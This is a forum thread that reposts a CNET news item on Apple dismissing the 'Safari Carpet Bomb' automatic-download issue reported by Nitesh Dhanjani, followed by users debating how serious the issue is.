Overclock.net › Forums › Industry News › Software News › [CNET]Apple dismisses Safari vulnerability
New Posts  All Forums:Forum Nav:

[CNET]Apple dismisses Safari vulnerability

post #1 of 12
Thread Starter 
Safari users are at risk of littering their desktops with malicious software because the browser does not ask for user permission when downloading files in the way that Firefox and Internet Explorer do, a security researcher said Thursday.

In a blog post titled "Safari Carpet Bomb," Nitesh Dhanjani describes how a rogue Web site can easily download resources to the Windows desktop or downloads directory on the Mac.

An Apple representative told Dhanjani that an "enhancement request" for an "Ask me before downloading anything" preference would be filed with the Safari team. "Please note that we are not treating this as a security issue, but a further measure to raise the bar against unwanted downloads," the Apple representative wrote in an e-mail to Dhanjani.

Apple does plan to fix a high-risk security vulnerability that Dhanjani discovered. It could be used to remotely steal local files from a user's file system.

An Apple spokesman did not return a phone call and e-mail seeking comment.



"Since Safari does not know how to render content-type of blah/blah, it will automatically start downloading carpet_bomb.cgi every time it is served. If you are using Safari in Windows, this is what will happen to your desktop once you visit http://malicious.example.com/," Dhanjani writes in explaining this screenshot.
(Credit: Nitesh Dhanjani)

Source: CNET
post #2 of 12
Noobs! They have a chance of getting another decent browser up there, and look what they do.
post #3 of 12
Why all the articles on these two minor, contrived, proof of concept bugs? The carpet bomb would be irritating if anybody ever used it, but nobody would gain anything from it
It goes to eleven
(13 items)
 
  
CPUMotherboardGraphicsRAM
E6300 DS3 EVGA 8600GTS 2GB XMS2 DDR2-800 
Hard DriveOSMonitorKeyboard
1.294 TB Arch Linux/XP Samsung 226bw Eclipse II 
PowerCaseMouse
Corsair 520HX Lian-Li v1000B Plus G7 
  hide details  
Reply
It goes to eleven
(13 items)
 
  
CPUMotherboardGraphicsRAM
E6300 DS3 EVGA 8600GTS 2GB XMS2 DDR2-800 
Hard DriveOSMonitorKeyboard
1.294 TB Arch Linux/XP Samsung 226bw Eclipse II 
PowerCaseMouse
Corsair 520HX Lian-Li v1000B Plus G7 
  hide details  
Reply
post #4 of 12
Quote:
Originally Posted by rabidgnome229 View Post
Why all the articles on these two minor, contrived, proof of concept bugs? The carpet bomb would be irritating if anybody ever used it, but nobody would gain anything from it
How is it minor if it gives the possibility to automatically download files without the user's consent? That's a huge security risk in my opinion.
Gaming Rig
(13 items)
 
  
CPUMotherboardGraphicsRAM
AMD Athlon 64 x2 4600+ AM2 Dell 0CT103 EVGA GeForce 9600GT 512MB 4 x 1GB Wintec (DDR2-667) 
Hard DriveOSMonitorCase
SAMSUNG HD160JJ/P SATA-II 160GB Windows Vista Ultimate x64 Dell 1907FP 19" Dell Dimension E521 
Mouse
Logitech MX518 
  hide details  
Reply
Gaming Rig
(13 items)
 
  
CPUMotherboardGraphicsRAM
AMD Athlon 64 x2 4600+ AM2 Dell 0CT103 EVGA GeForce 9600GT 512MB 4 x 1GB Wintec (DDR2-667) 
Hard DriveOSMonitorCase
SAMSUNG HD160JJ/P SATA-II 160GB Windows Vista Ultimate x64 Dell 1907FP 19" Dell Dimension E521 
Mouse
Logitech MX518 
  hide details  
Reply
post #5 of 12
Quote:
Originally Posted by Dennisjr13 View Post
How is it minor if it gives the possibility to automatically download files without the user's consent? That's a huge security risk in my opinion.
Not unless you can execute it. Otherwise it's just an annoyance with no point
It goes to eleven
(13 items)
 
  
CPUMotherboardGraphicsRAM
E6300 DS3 EVGA 8600GTS 2GB XMS2 DDR2-800 
Hard DriveOSMonitorKeyboard
1.294 TB Arch Linux/XP Samsung 226bw Eclipse II 
PowerCaseMouse
Corsair 520HX Lian-Li v1000B Plus G7 
  hide details  
Reply
It goes to eleven
(13 items)
 
  
CPUMotherboardGraphicsRAM
E6300 DS3 EVGA 8600GTS 2GB XMS2 DDR2-800 
Hard DriveOSMonitorKeyboard
1.294 TB Arch Linux/XP Samsung 226bw Eclipse II 
PowerCaseMouse
Corsair 520HX Lian-Li v1000B Plus G7 
  hide details  
Reply
post #6 of 12
Woo. I needed this for my assignment at school. +Rep Miki
McSteve
(10 items)
 
Zohard 5
(17 items)
 
 
CPUMotherboardGraphicsRAM
Ryzen 5 1600 MSI Bazooka B350M Asus Dual RX460 OC (Unlocked) G.Skill Ripjaws 4 
Hard DriveHard DriveCoolingOS
Transcend SSD220 WD Blue Wraith Spire Windows 10 
PowerCase
Corsair VS550 DeepCool SmartLED 
CPUMotherboardGraphicsRAM
Xeon E3-1231V3 AsRock H97 Performance Asus R9 290 Direct Cu II OC G.Skill 1333mhz 2 x 4GB 
RAMHard DriveHard DriveHard Drive
Kingston HyperX Blu 2 x 4GB WD Blue 320GB WD Blue 1TB Intel 330 120GB SSD 
Optical DriveCoolingOSMonitor
LG Super Blu Coolermaster Hyper 212 EVO Windows 10 Pro TCL 50" TV 
KeyboardPowerCaseMouse
Coolermaster Quickfire TX (Cherry Red) Fractal Design Integra M 650W NZXT Guardian 921 Logitech G300 
Audio
Sony 5.1 Home Theatre 
  hide details  
Reply
McSteve
(10 items)
 
Zohard 5
(17 items)
 
 
CPUMotherboardGraphicsRAM
Ryzen 5 1600 MSI Bazooka B350M Asus Dual RX460 OC (Unlocked) G.Skill Ripjaws 4 
Hard DriveHard DriveCoolingOS
Transcend SSD220 WD Blue Wraith Spire Windows 10 
PowerCase
Corsair VS550 DeepCool SmartLED 
CPUMotherboardGraphicsRAM
Xeon E3-1231V3 AsRock H97 Performance Asus R9 290 Direct Cu II OC G.Skill 1333mhz 2 x 4GB 
RAMHard DriveHard DriveHard Drive
Kingston HyperX Blu 2 x 4GB WD Blue 320GB WD Blue 1TB Intel 330 120GB SSD 
Optical DriveCoolingOSMonitor
LG Super Blu Coolermaster Hyper 212 EVO Windows 10 Pro TCL 50" TV 
KeyboardPowerCaseMouse
Coolermaster Quickfire TX (Cherry Red) Fractal Design Integra M 650W NZXT Guardian 921 Logitech G300 
Audio
Sony 5.1 Home Theatre 
  hide details  
Reply
post #7 of 12
Quote:
Originally Posted by rabidgnome229 View Post
Not unless you can execute it. Otherwise it's just an annoyance with no point
But most people will go:
"whats this?"
*double click*

We would just delete it, but so many people would open it to see what it is and bam there goes their computer lol
    
CPUMotherboardGraphicsRAM
Intel 2500k Gigabyte Z68X-UD3H-B3 XFX HD5870 16GB G.Skill RipjawsX 
Hard DriveOptical DriveCoolingOS
60GB OCZ Vertex 3 + 2x TB Seagate LG DVD+RW Stock Intel Windows 7 64bit / OSX Mountain Lion 
MonitorKeyboardPowerCase
Dell ST2210 + 17" IBM Das Ultimate S Antec TruePower 650W Antec P183 
MouseMouse PadAudioAudio
Logitech MX Revolution X-Trac Ripper Objective 2 + ODAC Combo Sennheiser HD650 + Klipsch 2.1 Promedia 
  hide details  
Reply
    
CPUMotherboardGraphicsRAM
Intel 2500k Gigabyte Z68X-UD3H-B3 XFX HD5870 16GB G.Skill RipjawsX 
Hard DriveOptical DriveCoolingOS
60GB OCZ Vertex 3 + 2x TB Seagate LG DVD+RW Stock Intel Windows 7 64bit / OSX Mountain Lion 
MonitorKeyboardPowerCase
Dell ST2210 + 17" IBM Das Ultimate S Antec TruePower 650W Antec P183 
MouseMouse PadAudioAudio
Logitech MX Revolution X-Trac Ripper Objective 2 + ODAC Combo Sennheiser HD650 + Klipsch 2.1 Promedia 
  hide details  
Reply
post #8 of 12
Quote:
Originally Posted by Higgins View Post
But most people will go:
"whats this?"
*double click*

We would just delete it, but so many people would open it to see what it is and bam there goes their computer lol
Curiosity killed the cat.
Rig
(15 items)
 
   
CPUMotherboardGraphicsRAM
i7 5820K MSI X99A SLI PLUS EVGA GTX 1070 FTW 4x8GB G.Skill Ripjaws  
Hard DriveHard DriveCoolingOS
Samsung 850 Pro Samsung 850 Evo Noctua NH-D15 Windows 10 
MonitorKeyboardPowerCase
Dell U2515H Happy Hacking Keyboard 2  EVGA Supernova 750 G2 Corsair 600Q 
MouseMouse PadAudio
Logitech G403 Steelseries QcK Mass M-Audio AV40 
CPUMotherboardGraphicsRAM
i7 930 @ 3.7 HT Gigabyte X58A-UD3R VisionTek 4870x2 3x4GB's G.Skill Ripjaws 1600 
Hard DriveOptical DriveOSMonitor
500GB AAKS, 2x 640GB AAKS, 2x 1TB Samsung SH-S203B Windows 7 Ultimate 64-bit Samsung 245BW 
KeyboardPowerCaseMouse
Happy Hacking Keyboard 2 Silverstone OP850 Antec 1200 [Three Nanoxia FX12] [Two San Ace 1011] Logitech G500 
Mouse Pad
Razer eXactMat 
CPUGraphicsRAMHard Drive
i7 3615QM GT 650M 16GB DDR3 256GB SSD 
OS
OS X Mountain Lion 
  hide details  
Reply
Rig
(15 items)
 
   
CPUMotherboardGraphicsRAM
i7 5820K MSI X99A SLI PLUS EVGA GTX 1070 FTW 4x8GB G.Skill Ripjaws  
Hard DriveHard DriveCoolingOS
Samsung 850 Pro Samsung 850 Evo Noctua NH-D15 Windows 10 
MonitorKeyboardPowerCase
Dell U2515H Happy Hacking Keyboard 2  EVGA Supernova 750 G2 Corsair 600Q 
MouseMouse PadAudio
Logitech G403 Steelseries QcK Mass M-Audio AV40 
CPUMotherboardGraphicsRAM
i7 930 @ 3.7 HT Gigabyte X58A-UD3R VisionTek 4870x2 3x4GB's G.Skill Ripjaws 1600 
Hard DriveOptical DriveOSMonitor
500GB AAKS, 2x 640GB AAKS, 2x 1TB Samsung SH-S203B Windows 7 Ultimate 64-bit Samsung 245BW 
KeyboardPowerCaseMouse
Happy Hacking Keyboard 2 Silverstone OP850 Antec 1200 [Three Nanoxia FX12] [Two San Ace 1011] Logitech G500 
Mouse Pad
Razer eXactMat 
CPUGraphicsRAMHard Drive
i7 3615QM GT 650M 16GB DDR3 256GB SSD 
OS
OS X Mountain Lion 
  hide details  
Reply
post #9 of 12
Quote:
Originally Posted by Higgins View Post
But most people will go:
"whats this?"
*double click*

We would just delete it, but so many people would open it to see what it is and bam there goes their computer lol
OSX warns you when you attempt to open executables downloaded from the internet. If they choose to open it when prompted then they would have chosen to download it when prompted anyway
It goes to eleven
(13 items)
 
  
CPUMotherboardGraphicsRAM
E6300 DS3 EVGA 8600GTS 2GB XMS2 DDR2-800 
Hard DriveOSMonitorKeyboard
1.294 TB Arch Linux/XP Samsung 226bw Eclipse II 
PowerCaseMouse
Corsair 520HX Lian-Li v1000B Plus G7 
  hide details  
Reply
It goes to eleven
(13 items)
 
  
CPUMotherboardGraphicsRAM
E6300 DS3 EVGA 8600GTS 2GB XMS2 DDR2-800 
Hard DriveOSMonitorKeyboard
1.294 TB Arch Linux/XP Samsung 226bw Eclipse II 
PowerCaseMouse
Corsair 520HX Lian-Li v1000B Plus G7 
  hide details  
Reply
post #10 of 12
Quote:
Originally Posted by rabidgnome229 View Post
OSX warns you when you attempt to open executables downloaded from the internet. If they choose to open it when prompted then they would have chosen to download it when prompted anyway
So does every other operating system in existence(well except linux, which requires you to open the console, become su and chmod it into being executable ). If Vista's UAC has taught us anything, its that after clicking "Allow" for the 1000th time it becomes automatic. I could almost guarantee that if Microsoft implemented a patch that changed every 15th UAC message to "Windows needs your permission to have sex with your wife", 90% of the population wouldn't notice it until it came up on Digg.



Oh and typical Apple, "This is not a problem, you will not mention this anymore, whenever you hear a car honk you will buy a song off of iTunes"
    
CPUMotherboardGraphicsRAM
Core i5 4670k ASUS Maximus VI Gene Gigabyte GTX 460 1GB Kingston Hyper-X 
Hard DriveHard DriveHard DriveHard Drive
Samsung 830 OCZ Vertex 3 WD6401AALS WD5000AAKS 
CoolingOSMonitorMonitor
Noctua NH-D14 elementary OS Dell Ultrasharp U2312HM LG W2442PA-BF 
KeyboardPowerCaseMouse
Microsoft Sidewinder X4 Corsair HX750W Corsair Graphite 600T Logitech G700 
Audio
ASUS Xonar DG 
  hide details  
Reply
    
CPUMotherboardGraphicsRAM
Core i5 4670k ASUS Maximus VI Gene Gigabyte GTX 460 1GB Kingston Hyper-X 
Hard DriveHard DriveHard DriveHard Drive
Samsung 830 OCZ Vertex 3 WD6401AALS WD5000AAKS 
CoolingOSMonitorMonitor
Noctua NH-D14 elementary OS Dell Ultrasharp U2312HM LG W2442PA-BF 
KeyboardPowerCaseMouse
Microsoft Sidewinder X4 Corsair HX750W Corsair Graphite 600T Logitech G700 
Audio
ASUS Xonar DG 
  hide details  
Reply
New Posts  All Forums:Forum Nav:
  Return Home
  Back to Forum: Software News
Overclock.net › Forums › Industry News › Software News › [CNET]Apple dismisses Safari vulnerability